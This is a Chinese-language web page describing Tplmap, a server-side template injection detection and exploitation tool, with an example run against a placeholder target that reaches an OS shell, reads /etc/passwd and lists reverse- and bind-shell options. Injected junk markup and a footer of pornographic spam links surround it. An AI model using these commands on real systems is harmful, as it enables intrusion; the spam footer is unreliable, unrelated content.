<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          Tplmap注入漏洞檢測(cè)工具

          聯(lián)合創(chuàng)作 · 2023-09-26 21:45

          自動(dòng)檢測(cè)和發(fā)掘服務(wù)器端模板的注入漏洞。支持測(cè)試Mako, Jinja2, Jade, Smarty, Freemarker, Velocity, 和Twig。

          示例:

          $ ./tplmap.py -u 'http://www.target.com/app?id=*' 
          [+] Tplmap 0.1
              Automatic Server-Side Template Injection Detection and Exploitation Tool
          
          [+] Found placeholder in GET parameter 'inj'
          [+] Smarty plugin is testing rendering with tag '{*}'
          [+] Smarty plugin is testing blind injection
          [+] Mako plugin is testing rendering with tag '${*}'
          ...
          [+] Freemarker plugin is testing blind injection
          [+] Velocity plugin is testing rendering with tag '#set($c=*)\n${c}\n'
          [+] Jade plugin is testing rendering with tag '\n= *\n'
          [+] Jade plugin has confirmed injection with tag '\n= *\n'
          [+] Tplmap identified the following injection point:
          
            Engine: Jade
            Injection: \n= *\n
            Context: text
            OS: darwin
            Technique: render
            Capabilities:
          
             Code evaluation: yes, javascript code
             Shell command execution: yes
             File write: yes
             File read: yes
             Bind and reverse shell: yes
          
          [+] Rerun tplmap providing one of the following options:
          
             --os-shell or --os-cmd to execute shell commands via the injection
             --upload LOCAL REMOTE to upload files to the server
             --download REMOTE LOCAL to download remote files
             --bind-shell PORT to bind a shell on a port and connect to it
             --reverse-shell HOST PORT to run a shell back to the attacker's HOST PORT
          
          $ ./tplmap.py -u 'http://www.target.com/app?id=*' --os-shell
          [+] Run commands on the operating system.
          
          linux $ whoami
          www-data
          linux $ ls -al /etc/passwd
          -rw-r--r--  1 root  wheel  5925 16 Sep  2015 /etc/passwd
          linux $

          支持的模板引擎:

          Template engine Detection Command execution Code evaluation File read File write
          Mako render+blind yes python yes yes
          Jinja2 render+blind yes python yes yes
          Nunjucks render+blind yes javascript yes yes
          Jade render+blind yes javascript yes yes
          Smarty (unsecured) render+blind yes PHP yes yes
          Freemarker render+blind yes no yes yes
          Velocity render no no no no
          Twig render no no no no
          Smarty (secured) render no no no no


          瀏覽 15
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          編輯 分享
          舉報(bào)
          評(píng)論
          圖片
          表情
          推薦
          點(diǎn)贊
          評(píng)論
          收藏
          分享

          手機(jī)掃一掃分享

          編輯 分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  中文字幕在线字幕中文乱码区别 | 北条麻妃办公室性爱在线观看 | 亚洲AV无码成人片在线 | 高清国产mv在线观看 | 中文字幕AV电影 |